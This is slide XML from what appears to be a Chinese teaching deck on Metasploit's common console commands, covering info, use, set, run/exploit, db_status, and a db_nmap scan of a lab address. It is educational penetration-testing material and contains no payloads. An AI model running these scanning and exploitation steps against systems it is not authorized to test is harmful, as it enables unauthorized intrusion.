                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639310" y="1294765"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>“info”命令可以查看模块的详细信息，在msfconsole 中输入“info”命令可以显示查看结果，如图2-4-10所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639310" y="2216785"/>
            <a:ext cx="5276850" cy="1590675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639310" y="3807460"/>
            <a:ext cx="5080000" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-10 查看信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>9.“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>use”命令可调用模块，“show options”命令查看调用模块时需要设置的参数，“set”命令为参数赋值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10.使用“run”或“exploit”命令调用模块。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit数据库相关命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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15" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870450" y="1722755"/>
            <a:ext cx="6015990" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在msfconsole的命令行中输入“db_status”命令可以查看当前数据库的连接状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.“db_nmap”命令调用nmap工具进行扫描，然后将扫描结果保存到数据库中，以方便查看。配合“-F”参数可进行快速扫描，如“db_nmap -F 192.168.172.129”。这样扫描到的结果与在普通的命令行中调用nmap工具进行扫描的结果是一样的。不同的是，这里的扫描结果可以保存在 Metasploit的数据库中，使用“services”命令便可查看到扫描结果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
